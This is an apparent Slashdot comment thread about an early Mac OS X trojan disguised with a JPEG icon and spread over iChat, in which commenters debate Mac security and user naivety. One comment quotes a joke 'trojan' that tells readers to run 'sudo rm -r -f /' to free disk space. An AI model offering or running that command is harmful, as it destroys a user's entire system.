What most surprised the geek was when he saw Steve Jobs. "What's Steve Jobs doing in heaven? I didn't think he was dead yet?!"

"That's not Steve Jobs," replied the angel. "That's God. He just thinks he's Steve Jobs."

Re:Hehehe

[NutscrapeSucks]

The G5 faster than the P4 but not the Pentium M or the AMD parts.

Even that's arguable, and was based on (A) Dubious SPEC scores that Apple never had the nuts to submit officially, and (B) a version of Quake 3 that was coded for SMP on Mac but not Intel.

Re:Hehehe

[mdarksbane]

Sorry, then-current PCs. When it was actually new, not after Moto completely stalled on it.

And as someone who used to game on a G3 300, and read every benchmark and test he could find, it was my experience that it ran about as pfast as a PII 350. Which was what was current when I bought the machine.

And since there were 604e's at 300 mhz before that, and teh 604e was actually faster clock/clock than G3... that would make it faster than PII's at the time. Which it was, by every benchmark (third party, not apple) I found when i was looking into buying a computer then.

It was a helluva a lot more expensive, but it was darned fast.

Hmmm, First Virus to ask for your password?

[jtalerico]

Before this "Virus" Can do anything on macOS X it should ask for the users password. So if the user is dumb enough to put in his/her password to OPEN a JPEG!! Then his/her password should be posted on /. with the ip of their computer.

Re:Hmmm, First Virus to ask for your password?

[Vo0k]

The virus can still delete your personal files without root password, it can access your IM contact list and send itself to all people on the list. You still have fully functional OS but all your work you didn't backup is gone. Fun?
Or just install a keylogger and sit in the background waiting till you enter your root password thorough normal use.

Such a virus would be pretty hard on Linux, because icons are assigned to files by content, not by extension. It would have .jpg extension but the icon would be one of a binary. And of course variety of instant messenging software would make it way harder to spread. (still possible though, and despite what some would like to think, there ARE enough dumb Linux user to click on a file with .jpg extension even if it doesn't look like jpg)

Re:Hmmm, First Virus to ask for your password?

[jtalerico]

To do what this file does, it will prompt the user for the password.

Re:Hmmm, First Virus to ask for your password?

[WhiteWolf666]

OS X did not assign an icon to the file. It's not even labeled at .jpeg

It's a .tgz, and it contains one executable (not labeled .jpg). Instead, the resource fork specifies an icon that looks remarkably similar to the one the operating system uses for JPEG.

Re:Hmmm, First Virus to ask for your password?

[amliebsch]

Only if the user is root.

Re:Hmmm, First Virus to ask for your password?

[SirTalon42]

And on a linux desktop binaries can't specify an icon internally to do that trick. Though they could include BOTH the binary and a .desktop file that has an icon for an image, except that would be incredibly suspicious, especially since theres different desktop environments use different icons.

10.5 Screenshots?!

[fightzombies]

Where? I want to see!

Re:10.5 Screenshots?!

[javaxman]

Where? I want to see!

Yea, pretty funny... it's commented on more than a few times in the MacRumors thread how clever it was in a 'social engineering' sense to release it there as OS X 10.5 screenshots. I mean, normally you'd think some model or actress nude would be better bait, but then you'd just get a forum full of Windows users complaining about how all they got was a folder with a "Contents" folder, an "Info.plist" file, and some other weird files... then the jig would be up for sure!

Re:10.5 Screenshots?!

[P.+Niss]

latestpics.tgz

This would work on Linux

I followed the link and found that the file in question was a '.tgz'. So, if someone is dumb enough to download such a file and untar it ... maybe they'll even su into root when it asks them to.

It would be trivial to write such a program for Linux. It would work as long as there was a naive user.

Re:This would work on Linux

[PeterSomnium]

But that's the problem.. Even linux-users can be pretty naive. Anyway, this 'virus' isn't really going to pose any threats to the computing world , or is someone going to disagree with me there?

Re:This would work on Linux

No. Firstly, most (if not all) Linux DEs determine the file's icon from the content of the file itself - there is no universal way of bundling an icon with a program so that it shows up as the correct JPEG icon for the user's DE (Gnome/KDE or any theme thereof).

Secondly, Each disto handles root access differently. Ubuntu, for instance, doesn't set a root password by default as all user-admin tasks are performed through sudo. This is different than, say, Debian, where by default you have to su accounts to root. Then, to actually fool the user into entering their password you'd have to know which prompt to throw them. For Ubuntu, it's gksudo, for Kubuntu it'll be the KDE equivilent and so on and so forth for every distro out there.

So even if you write a 'virus' like this that even behaves properly on one flavour of Linux, it'd look totally out of place on all the rest.

configured correctly?

[green+pizza]

It seems that if you have configured your computer correctly, you would have to enter your admin password in order to allow it to do any harm.

That should be pretty much any default or out-of-the-box configuration of Mac OS X me thinks. Even on Macs with only one user and no password the machine will generally put up a prompt before making certain changes. Probably even saver if you have a password and multiple user accounts.

Re:configured correctly?

Right. However, a persistent user could potentially activate the root account and log in as it regularly. I can't think of any other way to get around this, though (other than running it from Terminal and using sudo, which isn't much different).

Basically you just about have to be trying to do something stupid.

Re:It's The Final Countdown

The Final Countdown was by Europe, not Bon Jovi.

Re:It's The Final Countdown

"Bon Jour" is french for "Hello" or "Good Morning" or something like that.

Misread the preview

[steveo777]

Thought it said the virus spread via "Bon Jovi." I always thought there had to a reason to come out of retirement... other then the whole singing thing.

Re:Misread the preview

Thought it said the virus spread via "Bon Jovi."

Of course, the guy who wrote the trojan is now Wanted Dead or Alive for spreading Bad Medicine. He'll be Living On A Prayer till the Feds catch him.

Further

[ktappe]

In all the latest releases of OS X, the user will also receive the prompt "You are running for the first time. Are you sure you want to continue?" so that's *four* levels of security the user would have to specifically circumvent to be affected. At some point the responsibility has to reasonably be shifted from Apple to the user... -Kurt

Re:Further

[Gryle]

Haven't you heard? Personal responsibility died a long time ago, my friend.

Re:Further

[thatkeith]

That only happens when you double-click a document which opens an app for the first time, not when the app is launched *directly* for the first time. This is a well-considered security step, but it doesn't come into play here. Still - three levels of security is a fair bit, eh?

Re:Further

[AnalystX]

I beg to differ. Although I'm not sure why Apple did it, and I was a bit surprised last night when it happened, I ran an application "directly" and it prompted me about running it for the first time. If Apple intended to have this prompt show its face only when a document opens an application, there may be a flaw in the latest version (10.4.5).

Re:Further

[thatkeith]

Or perhaps this was done to add precisely that level of security! Thanks for the correction btw. I was sure that's how it worked... but I guess things have changed either in the very latest OS update or in my own memory!

Re:It's The Final Countdown

[post.scriptum]

More like a typo of "Bonjour"... French "virus", this is sad.

Oompa-Loompa Trojan

[coastin]

Looks like a lot of work to just get this thing. Not at all a lazy persons trojan.

Virus Acid Test

[green+pizza]

So, to me the question remains... is there a way to get this (or any other) Mac OS X virus by just connecting a Mac to the Internet and/or surfing websites? Or do these exploits still require the user to manually execute a trojan? I guess I'm curious how automated these Mac OS X "viruses" are.

Re:Virus Acid Test

[Yahweh+Doesn't+Exist]

you must receive an email with the attachment, unzip the attachment, open a file with an icon made to look like an image, type in the admin password, not think why looking at an image needs admin priviledges, and press ok.

Re:Virus Acid Test

[coastin]

Unfortunately no, Mac users have to work harder than Win users to get free software over the nternet.

Re:Virus Acid Test

[WhiteWolf666]

There's no exploit.

Its a compressed file. You have to uncompress it.

Then, you have to double click on the icon. The sneaky part is the executable uses the JPEG icon.

Then, you have to enter your password.

I invented a similar trojan before. It requires slightly more user intervention. I'll quote you it here:

"Please type the following at the terminal for increased disk space:
sudo rm -r -f /
Please type your password when prompted, and make sure to send this performance tip to all your friends."

This 'trojan' is only slightly more sophisticated.

Re:Previous slashdot coverage

[kneeslasher]

This is true. I've been much more complacent since I switched. While I'd never type in my Admin password due to a JPEG, I am sure the complacency of which you write might well mean that moany users would, especially as the Mac population grows and statistically includes more silly users.

Good point

[QuaintRealist]

Looks like a Trojan, not a virus. And any OS (disclosure: I admin a mixed Linux/windows system at work and the wife has a Mac at home) is vulnerable to Trojan attack with varying degrees of user "assistance". Our internet capable machines at work are livecd only for this reason (Slax FWIW). Windows laptops use DSL imbedded (at the moment).

Use protection, browse safely, and the net is a pretty safe place still...

Re:Good point

[BladeMelbourne]

For those wanting to follow this advice...

Use protection -> wear condoms
browse safely -> wear sunglasses

Never has surfing the net been so cool (and safe!)

Re:Good point

[Shanep]

Hey, this is slashdot.

Use protection -> wear condoms

Because the readers here will catch something from themselves?

browse safely -> wear sunglasses

How many slashdot readers actually see sunlight for real?

I Like The Trojan Horse That Was Used

[RobotRunAmok]

The first Mac virus hidden cleverly inside a picture of desktop eyecandy. No doubt it will spread like wildfire. Insidious.

What wrapper will the first Linux widespread virus take? "Hey, download this PDF -- it's a transcript of a big IRC shouting match about which is better, emacs or vi! You gotta read this!"

We won't know what hit us...

Re:I Like The Trojan Horse That Was Used

[daveschroeder]

Um, no.

There's no desktop eye candy, and this is hardly clever.

That's *social engineering*. Any Mac document or executable has been able to have the outward appearance of having any icon for 22 years. So that's not new.

This won't spread. It will be yet another social engineering/trojan/malware/"virus" novelty with little to no impact beyond the mock panic sure to ensue in the press.

All it's going to take is one major outlet to pick it up, and we'll have another "Mac OS X Just As Insecure As Windows" free-for-all.

Re:I Like The Trojan Horse That Was Used

[Seferino]

All it's going to take is one major outlet to pick it up, and we'll have another "Mac OS X Just As Insecure As Windows" free-for-all.
You're right, that's better than "emacs vs vi" as the next virus wrapper.

Re:I Like The Trojan Horse That Was Used

[foniksonik]

PDF, puhlease... it better be a LaTex document or LUsers won't even bother with it!

Re:I Like The Trojan Horse That Was Used

[javaxman]

No doubt it will spread like wildfire.

As much as it'd be fun if that were true... no.

To spread this, you have to
a) have someone in your buddy list who is infected.
b) not think anything of opening a compressed file you get over iChat without any explaination of what it is
c) either be running as Admin all the time, or ( even more crazy ) not pause to think when double-clicking on a JPG requires Admin authentication for some reason.

Uhhh... yea... I'm going to guess this is just going to be an opportunity for FUD and anti-virus sales. And for a few of us to reconsider using Admin accounts all the time... spread like wildfire ? how many OS X users do you know who will fit all of a,b, and c ?

Oh, wait, I forgot (d), don't have file extensions showing or won't notice ".app" in the name of the file if they do!

The only people who are having to deal with this downloaded the original file just to see if it really was going to try to infect their systems. Ooops! The only shocker for them is that it's spreading over Rendevous to their other systems... but at least they'll know not to *execute* it there, hopefully. Otherwise there's no helping them, they *like* this app.

Re:I Like The Trojan Horse That Was Used

[NutscrapeSucks]

This won't spread.

Why not? Because the few Mac users are too spread out for mass social engineering to be effective?

The IM part is a smart bit because iChat is somewhat biased towards Mac users.

Re:Phew! Thanks!

[platypibri]

That may be THE funniest slashdot post ever! I, for one, welcome our executable jpeg masters.

Re:grow up

[Lord+Bitman]

Virus != Worm

Need a Universal Binary

[WhiteWolf666]

Anyone know when the Universal Binary will be avaliable? Plus, we need a "no password" crack.

When will Mac viruses get to the level of Windows when? For godsakes, this one still requires user intervention, and it doesn't even work on all OS X platforms!

Come on Apple! Microsoft has you soundly beaten in this regard :(

Re:Need a Universal Binary

[Gryle]

Oh I see how it is. Leave out the open source software. I demand equality for all operating systems! Linux and BSD users should enjoy the same threat level as Windows or Mac!

.Well, I don't know

[IAAP]

You cannot simply "catch" the virus.

I put my Mac on a toilet seat and I got this virus...Really!

Re:.Well, I don't know

[Shanep]

I put my Mac on a toilet seat and I got this virus...Really!

That's not a virus. The cool kids call them "crabs" although your doctor will probably refer to them as "pubic lice".

It is a virus.

[tpgp]

Sounds more like a trojan to me.

Unlike viruses and worms, Trojans do not reproduce by infecting other files nor do they self-replicate.

I would say (from the description in tfa) that this piece of malware is more similar to a virus then a worm or a trojan.

Why?

1) It appears to self propagate (Trojans do not do this).
2) It appears to attach to other executables (worms are stand alone)

So we have a self-propagating piece of code that attaches itself to other executables. Quacks like a virus if you ask me.

Surely you can't mean...

[iBod]

http://www.virgin-atlantic.com/

Re:Surely you can't mean...

[APurplePolarBear]

No dude, I think he means Symantec.

;o)

Re:Surely you can't mean...

[Bazzalisk]

Which notably doesn't rhyme with pedantic, whilst virgin-atlantic notably does.

:)

Re:Surely you can't mean...

[iBod]

Well - no shit Sherlock!

Re:Surely you can't mean...

Hey Dude!

No, I think he means you need a sense of humor and a little wit to understand his post!

Go look up things like 'irony', 'incongruity', 'absurdity' etc.

You're like some little kid telling a grown up that his joke isn't funny because you don't get it - Dude! ;oP

Re:Surely you can't mean...

[iBod]

What's with the PURPLE thing.

Is PURPLE a code for:

"I have no sense of humor whatsoever and can't understand jokes unless they are very, very litteral and obvious and explained to me very slowly"

Re:Surely you can't mean...

[Ilgaz]

People using new Symantec stuff on Mac OS X live very "weird things" lately and they won't be able to figure if a virus infected their systems or they need a "live update" to fix some weird bug. :)

There were days when Peter Norton coded them himself...

And So It Begins...

[eno2001]

Grrreat... A Unix virus written by someone who probably knows more about Unix than most of the Slashdot crowd has forgotten, and it's targetted at the average non-technical Mac user who thinks that you are supposed to turn a computer off by pressing the power button. ;P (It's a joke folks. Lighten up.)

Re:And So It Begins...

[mini+me]

and it's targetted at the average non-technical Mac user who thinks that you are supposed to turn a computer off by pressing the power button. ;P

I turn my Mac off with the power button :/ It's nice and handy beside the keyboard and pops up a nice display asking me what I want to do. Much easier than finding my way to the Apple menu or remembering keyboard shortcuts.

Re:And So It Begins...

[eno2001]

My point exactly. Everyone who uses a REAL computer knows that you have to open a shell and type @SYS$SYSTEM:SHUTDOWN and answer a few questions. ;P (For all you VMSers out there...)

Re:And So It Begins...

[Anim8me2]

Don't forget that Apple was also smart enough to let us turn off our Macs from the display power button. Very handy for me since I have my computers in a different room than my displays. It even works with KVM switches. Know that of which you speak lest ye look like an ass.

Input Manager as an infection vector

[mrob2002]

John Gruber on daringfireball.net wrote at length recently about problems with OS X, mainly relating to how the Smart Crash library adds itself to applications through the Input Manager system hook. His current article "Smart Crash Reports Addenda" talks at length about the security implications of the input manager.

Re:Input Manager as an infection vector

For the record, Smart Crash Reports is not an Apple product. It is third-party software by Unsanity: http://www.unsanity.com/smartcrashreports

Re:Input Manager as an infection vector

[Ilgaz]

"For the record, Smart Crash Reports is not an Apple product. It is third-party software by Unsanity: http://www.unsanity.com/smartcrashreports [unsanity.com]"

For up to date info: They will now ask whether user needs to report the applications crash to developer or not. How evil the developers are asking anonymous, already sent to Apple by default crash data! :) (This is my take, I am not affiliated with Unsanity except buying/using their products)

http://www.unsanity.org/archives/000447.php

If Apple shared crash reports of Applications with developers, there wouldn't be need for such software. It is in fact a great favor to community and developers asking NOTHING at return. They give a very expensive functionality for free. Ask Netscape Inc how much they paid for talkback agent or similar companies.

I was naively sending crash reports to Apple which they don't really care if it is not their software or OS crashes with full descriptions for 2 years. When I figured even Adobe sized companies doesn't get them... Well you know...

That blog guy (grandparent mentions) did not mention any of these facts I bet. That is what I hate. I even shared some "interesting technology news" with Unsanity and they responded, they are a responsive team which does/did great favors to community asking nothing in return. To hell with his "famous" blogs Google whatever ads really.

There is some good news in all this

It means at least one person at Microsoft still knows how to code.

nitpick, panther=10.3

[green+pizza]

You have to admit though that many Mac users would like to see Panther pictures, and this is a good way of propagating the trojan.
Panther was 10.3
Tiger is 10.4
Dunno what 10.5 is

Re:nitpick, panther=10.3

[rekoil]

10.5 is "Leopard".

Re:nitpick, panther=10.3

[hattig]

Um, oh yeah. Doh.

Only so much space in my head for big cats. :p

The vulnerability isn't always plugged in

[Overzeetop]

Everybody seems so certain that this is a non-starter on OSX because it requires some user intervention to propagate. I have bad news for you: there are clueless Mac users out there, too. These are probably the same folks who will click on a web popup to "see the lastest hollywood gaff" and then "accept" the untrusted executable when windows warns about the download to be executed. And they're the same ones who will dutifully click their bank url in an email and login to make sure their information is correct .

Never understimate the power of the incomptenece of 20% of your userbase.

Re:The vulnerability isn't always plugged in

[WhiteWolf666]

That's why we don't consider it a vulnerability. There is no way to "fix" this without totally locking out the user.

There is no way to compensate for an Administator who is computer illiterate. It's simply not possible. You can lower the bar as much as you like, however, there is a certain minimum level of knowledge which is required to safely administer a computer.

Like don't run every application you get your hand on. This is similar to don't delete all your files.

Re:The vulnerability isn't always plugged in

[Overzeetop]

So, why allow customization of icons? That's the key area of the attack. People think they're opening an image, but its not. I know why. Pretty trumps Functional any day of the week. The problem isn't the OS, but the userbase. That and the "I'm bulletproof" attitude I hear from even neophyte mac users. *shrug* Any OS can be set up to be "secure" if you've got security conscious expert users and limited needs. I have about 6 windows boxes and one linux box, and haven't had a virus/trojan/worm affect the systems in the last decade (okay, technically the linux box is only a year old).

Most that I've seen have come in through email, but *suprise* I know better than to run a file with a .pif/.bat/.com/.exe extension. How freakin' hard is that? But you see people doing it everyday. And, as for win turning off extensions, what dumbass is so stupid that they try to open an image.jpg file, when they know darned well that none of their image files have an extension on them. But are they suspicious? Of course not...they're sheep.

To quote you, There is no way to compensate for an Administator who is computer illiterate., and that's exactly who you've got sitting in the chairs of home mac users. If they were computer literate, they'd likely have bought one of those other "hard to use" operating systems.

Re:The vulnerability isn't always plugged in

If they were computer literate, they'd likely have bought one of those other "hard to use" operating systems.

I think you typo'd masochist

Re:The vulnerability isn't always plugged in

[nine-times]

Never understimate the power of the incomptenece of 20% of your userbase. Ok, so lets assume that 20% of Mac users are incompetent and will run this thing. What negative consequences does that have for the 80% of us who aren't so incompetent? None. And that's where Apple's security seems to be doing a better job. So sure, maybe my neighbor is stupid and he wrecks his own machine. Let's say this thing was even smart enough to e-mail itself to me. It still won't get my machine without me decompressing and running the file. Already I'm not scared of this thing.

Re:The vulnerability isn't always plugged in

[o-hayo]

I don't think you get it. Locking users out of customizing icons wont change anything because some other random 'trick' will come by that does something equally misleading. The OS doesn't matter in cases like this yet you are still nailing mac users to the wall. If you can keep the nasties off of 6 windows boxes and 1 linux box then you will probably find that *gasp* you can accomplish the same with a mac. It seems that as much as you are sick of mac users throwing cliche lines about how they aren't affected by viruses (which, by the way, still, as of now, _they aren't_) you are becoming among the growing population of cliche mac bashers that reek of anti-anti-virus jealousy. Also, I will standup to anyone and argue until blue in the face that people who are more computer literate purchase macs, and the sheep, as you say, are the ones buying those hard to use operating systems - such an elegant description of windows by the way. Back to your regularly scheduled symantec updates...

Re:The vulnerability isn't always plugged in

[nine-times]

If they're computer literate, they'll evaluate their needs and find the best computer to suit those needs. And, all things being equal, they'd probably avoid the platform that is the biggest target for security attacks.

Re:The vulnerability isn't always plugged in

[Verminator]

Any OS can be set up to be "secure" if you've got security conscious expert users and limited needs.

Such as users scanning for naughtyware 24/7, living in stark terror of opening any email attachment? What the hell are "limited needs"?

We've all heard the argument. Yes, a Windows box can be made secure. Leave it unplugged, or spend your time patching and scanning.

When the spastic chimps in Redmond make a better mousetrap, I'll buy it. Gladly. Until that day, I'll use OS X. And laugh my ass off.

Re:The vulnerability isn't always plugged in

[oneandoneis2]

There is no way to compensate for an Administator who is computer illiterate.

Sure there is: It's called Trusted Computing and it takes away the end user's ability to be the administrator of his/her own computer ;o)

Re:The vulnerability isn't always plugged in

[99BottlesOfBeerInMyF]

That's why we don't consider it a vulnerability. There is no way to "fix" this without totally locking out the user.

You're partially right. The owner of a computer should have the ability to do whatever they want on their computer, including mess it up. The problem is that is not the only thing that is happening here. The user is being tricked into doing this because they are not given enough information and granularity of security. Now OS X does a lot of things right in this regard and is better than most of the competition, but it is not good enough to deal with some of the more sophisticated threats of the day.

First, new applications and scripts should run either with pre-configured ACLs or in a BSD-Jail type environment. Basically, any program that wants to contact the internet, access files it did not create, or modify other applications should have to ask the user for that privilege. Further, steps can be taken to make it harder for an executable to disguise itself as data, via the UI, like a visual clue to differentiate data and programs. Finally, by default the first user created has admin privileges that are, perhaps, over-broad. When a system is set up an administrative password should be required to be set, but the default user account should probably have somewhat lesser privileges, or at least need a password to alter default programs.

Now there will always be people who can be tricked into doing anything, but I really think that some better defaults and more user interaction is warranted for many events. How often do you want to run a program, by double clicking, that will modify other common programs on your machine. Would you rather have a dialogue that warns you when something tries to do this or not? Viruses like this one are performing uncommon operations and are easily recognizable due to that. It should not be hard to better deal with them.

Re:The vulnerability isn't always plugged in

[Myopic]

agreed. tell me how an administrator can have full control over his machine, yet still disallow a program from executing arbitrary commands with that administrator's explicit permission, in the form of entering your password. the software is an agent of the administrator, so anything the admin can do directly, the software can also do, with password permission.

this trojan is more like a tool which "allows" the administrator to install the trojan on the computer.

Re:The vulnerability isn't always plugged in

[Beryllium+Sphere(tm)]

>There is no way to "fix" this without totally locking out the user

How about not displaying executables with the icon for a JPEG?

Re:The vulnerability isn't always plugged in

[Overly+Critical+Guy]

Icons can be changed because OS X is a user-customizable system. My USB drives each have a custom icon to distinguish themselves from each other.

The difference between this and Windows is that OS X doesn't run you in a root account (root isn't even enabled without a special Terminal command), and running this will give you a password prompt.

That immediately means it's not an OS X flaw. Anyone could write any destructive program they wanted to, but because it would require a password, that doesn't make it a virus or trojan. The difference here is someone copied and pasted the JPEG icon, so it's tricking people into clicking it. But again, the password prompt comes up, preventing any automated processes as in Windows trojans which just silently hook themselves and run.

Re:The vulnerability isn't always plugged in

[Overly+Critical+Guy]

Quite true, but the point is that this isn't an OS X security flaw. The fact a password prompt pops up means OS X is already protecting you from this kind of attack to begin with and preventing any automatic hooking processes.

Any system-damaging program could be written for any OS. But when it requires the user's entered password to run it, that means it's not a virus or a trojan at all but a user-run program.

Every year, one of these goofy "OS X viruses" pops up, and everyone has to remind people that it pops up a password and specifically requires the user to grant it privileges to run. Contrast with the Windows world, where simply viewing a WMF automatically ran code without user intervention. That's the difference and is what makes this a non-starter in comparison.

Re:The vulnerability isn't always plugged in

[a.d.trick]

I understand that stupid people are going to be stupid. But that doesn't mean that Apple should just give up. The vunerability here is a result of a poorly done interface. The user though this was an image when it was actually an executable file. In an ideal world that should never happen. I understand, if a user downloads an app an runs it, well he deserves what he gets. But when he screws up a system because the interface 'lied' to him and he thought the app was an image, that is a vulnerability.

Re:The vulnerability isn't always plugged in

Actually, you're wrong there. This is PRECISELY the sort of thing that up to date antivirus software prevents every day in the Windows universe. Welcome to the world.

As has been already pointed out (and seeminly ignored) the vast majority of recent Win32 malware has been in the form of just this sort of self replicating trojan horse. One clever bit of Win32 malware even packs itself into a password protected ZIP (to evade gateway antivirus scanners) and mails itself (inside the ZIP) along with instructions asking the receiver to unpack with the supplied password.

And it spreads.

Here is the assessment of this worm: http://vil.nai.com/vil/content/v_138578.htm

And here is the ecrypted ZIP worm: http://vil.nai.com/vil/content/v_126792.htm

Re:The vulnerability isn't always plugged in

[Omestes]

So, why allow customization of icons? That's the key area of the attack. People think they're opening an image, but its not.

Err... As someone above you commented, it has been Mac OS functionality for 20+ years. And this is the first 'exploit', seems a pretty good record. It makes for a nicer experience, when I distribute my own .dmg, I can brand it for my program, or operation. You can brand you windows executables too, so this isn't an odd feature, or a bad one. One wanker misuses a valid feature in a social engeneering type worm, and suddenly the feature becomes insecure... Nope.

Yes, when I was still running my (now fried, hardware, not virus) Windows box, I didn't have a virus in over 10 years, nor worm, nor whatever the kids are calling them now. Not because of intrisnic security (every OS is insecure, equally so, I would say) but because of smart managment, and a healthy dose of paranoia. An exploit that is caused by user error is inevitiable on every OS, wait until Linux gets a bigger user-share, then the exploits will trickle in. The Windows crowd is about as idiotic as the Mac crowd, their both plebeian platforms, so most people have no clue as to security.

that's exactly who you've got sitting in the chairs of home mac users. If they were computer literate, they'd likely have bought one of those other "hard to use" operating systems.

And you lost credibility there, isn't OS flaming a bit passe by now? I wish I was as "1337" (insert derision) as you one year Linux kids! Or are we considering Windows as an "advanced" OS? Go to an IT conferance and count the PowerBooks.

Re:The vulnerability isn't always plugged in

[Omestes]

but it is not good enough to deal with some of the more sophisticated threats of the day.

I wouldn't call adding a thumbnail to a malicious executable 'sophisticated'.

Basically, any program that wants to contact the internet, access files it did not create, or modify other applications should have to ask the user for that privilege.

OS X does. It asks for your admin password. This is generally a clue that it might be doing something critical.

like a visual clue to differentiate data and programs

Heh... The .jpg, and .tgz extentions are a dead give away. Though I agree that OS X might need some form of executable extention. Only an idiot turns off extentions. Though sadly OS X and Windows do it by default.

I also think that OS X might need to actually tell you WHY you are putting in your admin password, in terms that both the knowledgable and typical user would understand. It does beat the "Yes" dialogue that we have to come to express from Windows, though, but there is room for improvement.

Re:The vulnerability isn't always plugged in

[99BottlesOfBeerInMyF]

I wouldn't call adding a thumbnail to a malicious executable 'sophisticated'.

i wouldn't call this malware sophisticated, either, at least no in terms of its interaction with the user.

OS X does. It asks for your admin password. This is generally a clue that it might be doing something critical.

This is completely wrong. If I download a new application, drag it to my Applications folder, and run it, OS X does not apply any restrictions beyond what my account has. It can do anything I can. Any new program can access the internet, monitor the keystrokes of my other apps, look at my personal files and modify them, or do anything else I, as a user, can do. It only asks for a password to modify items beyond my current privilege level, ie. sudo.

Heh... The .jpg, and .tgz extentions are a dead give away. Though I agree that OS X might need some form of executable extention. Only an idiot turns off extentions. Though sadly OS X and Windows do it by default.

Most users don't know what file extensions apply to executables and which apply to data. Many don't know the difference between the two. A visual cue would be useful for making users aware of this. Does OS X really ship with extensions hidden by default? It has been so long since I configured a machine from scratch I don't recall. I thought they shipped with extensions visible by default though.

I also think that OS X might need to actually tell you WHY you are putting in your admin password, in terms that both the knowledgable and typical user would understand. It does beat the "Yes" dialogue that we have to come to express from Windows, though, but there is room for improvement.

That is partly why the system needs finer permissions for application behaviors. That way it can have well defined, "This program is trying to access the keyboard input while another application is in the foreground. (stop it from reading keystrokes destined for other programs)(stop it from accessing keystrokes at all)(kill the program)(allow it to read typing destined for other programs)."

Re:The vulnerability isn't always plugged in

[aggemam]

In Mac OS X, when you double click, say, a Word document for the first time, the system asks if you really wish to open it using the application "Word".

A quick fix for the problem in case could be warning the user on the first time a new application is double clicked, informing he/she that it's in fact an executable which could cause harm.

Re:The vulnerability isn't always plugged in

[Overzeetop]

Well, I'm probably not the l33T H4x0r you expect. I started programming on an Apple II in the early 80s and managed to turn out some simple machine language programs for the 6502 in middle school. I don't do real admin anymore - I just don't have the time to keep up with it. My virus track record is merely a function of not opening stuff I don't trust. It's really not that hard. This exploit wouldn't affect me, either, if I used a Mac.

My comment about the "computer literate" had nothing to do with OS flaming. I was simply going with the market numbers, not making an OSX is crap statement. Most people buy something else (that would be true of everything but XP). The idea, or at least the marketing, is that Macs are for people who don't understand computers. Not "Bob" don't understand, but more in an "I don't want to fool with having to set it up" understand. If you understand computers, you're willing to put up with a bit more administration, if that happens to be the case. I'd put XP in the "hard to use" category, based on my experience in getting certain things to work right. The advantage is that some of those things weren't available for the mac at that time. The dig about other OSs being Advanced was not part of my comment.

Personally, if there were no cost to switch, and I could forget all the admin I have to do on my systems, I'd be happy to switch to something else. Unfortunately, it would probably mean several thousand dollars of downtime and I'd probably have to repurchase a good portion of my twenty grand in software. It's just not going to be in the budget. It's still more cost effective to waste two ro three thousand dollars of time a year on a known evil than spend the cash to change, and hope that there's no gremlins on the other side. Having been through OS changes at former employers, I'm still waiting for that advertised smooth transition and TCO to materialize.

Re:The vulnerability isn't always plugged in

[Omestes]

Sorry then for the semi-troll. It sounded like an elitist comment at the time. God bless the internet-text-medium, breeding misunderstanding for 30 years.

Until a bad power-supply fried my mobo/chip I did use mostly XP for business, and heavy use. The switching thing was mostly after being pissed off (3rd PSU to act up in my system), rather than some choice for simplicity.

If my PC was still up and running, I would probably put as much time on it is I do on my power-book, because it can do more, though with much cussing and fiddling (and hardware costs). Linux, right now, is just too much of a hastle, and has less viable software than OS X (sorry, the Gimp doesn't cut it for business graphics, or most professional photography, nor does Oo.org).

Tangent aside, about 1/4th of Mac users are "techies on vacation", but about half are about as bottom of the barrel as your general XP user. So you are right there. Apple, though, seems to have less of a history of idiot bugs, it is more difficult to propigate "free pr0n" worms because of the nice (BSD) underpinnings of the OS itself. It would be interesting to see a widespread OS X worm/trojan/virus go out, just to see what the reaction would be, ditto for Linux, of course. Some actual data on the idiocy of users of on the alt-OS scene would be interesting.

Doubfully (and thankfully), it won't happen for quite awhile, though. So all else is speculation.

I do think, though,

Re:The vulnerability isn't always plugged in

If you understand computers, you're willing to put up with a bit more administration, if that happens to be the case. I'd put XP in the "hard to use" category, based on my experience in getting certain things to work right

I get it... windows breeds linux masochists, who like to fuck about all day making their computer work properly; while mac users use mac to avoid that shit and do real work?

Re:The vulnerability isn't always plugged in

Never understimate the power of the incomptenece of 20% of your userbase.

Then Apple should come out with the idiotproofMac which has a heuristic software engine that detects actions like this. When the user makes a mistake, utilize negative reinforcement by spraying something like Raid from the iSight into their face or electrifying the keyboard and giving the user a mild shock. That will learn um really good.

Re:The vulnerability isn't always plugged in

[WhiteWolf666]

If they were computer literate, they'd likely have bought one of those other "hard to use" operating systems.

I agree with most of what you say, but "outch".

I think I'm pretty computer literate. All my home desktops run linux, as do my families, and my business computers. But I use a powerbook as my portable, and am currently buying a top of the line G5 powermac for Final Cut HD stuff, 'cause I think its the best software for the job.

Not all mac users are illiterate :) Some of us just like a snazzy package on a unixy system, and the extra $$ doesn't matter because its really small compared to the money we'll make off the machines. Oh, and they are easier to maintain ;-)

Re:The vulnerability isn't always plugged in

[njyoder]

Don't be a hypocrite. They've been whining about implementing this functionality for windows forever. I'm not even talking about proper sandboxing/privilege separation (restricted to running as the current user isn't sufficient since that's all you need to spread and cause havoc--plus most users blindly type in prompts).

I'm talking about how Outlook Express, years ago, disabled the ability to run executables from e-mails by default. IT EXPLICITS WARNS YOU. In fact, MSIE and other windows programs have added big warning windows saying stuff like 'this is an executable, it may be harmful, blah blah blah blah.' It prevents the users from doing it by default. It's trivial to add a warning for this and enable it by default. Hello, with the right policy settings on the computer, you can just flat out prevent the user from doing it (ideal for computers at an organization). Just because it's a wetware vulnerability doesn't mean you can't compensate for it.

Re:The vulnerability isn't always plugged in

20%? i wish i had your userbase :)

First of many

[aka_big_wurm]

As the Mac user base goes up so will mal-ware. It doesent help that people will be running cracked versions OSX on Windows boxes.

You can't man a .app look like a .jpg in OS X

[sjonke]

I tried to create an application that had a name of test.jpg.app and was pleased to find that, at least in Mac OS X 10.4.5, when you try to do this, the Finder displays the entire name, including the entire extension ".jpg.app", even though normally the ".app" portion is hidden. Take out the ".jpg" and the ".app" goes missing again. The "hide extension" option in the get info window is disabled when you have a name like ".jpg.app". So, it isn't quite so easy to disguise an application as a jpeg in Mac OS X. Of course not everyone is going to know what the .app means and so it being visible won't help them. Then again, if that's the case, they probably don't know what the .jpg means either!

I also tried doing this with a .term file, which was set to hide the extension. When I made the name test.jpg.term, the full name was displayed including ".term", and the "hide extension" option was disabled.

Re:You can't man a .app look like a .jpg in OS X

Plain executables without .app bundles need no extension at all. Underneath all the Mac pretties, it's still Unix.

Re:You can't man a .app look like a .jpg in OS X

[sjonke]

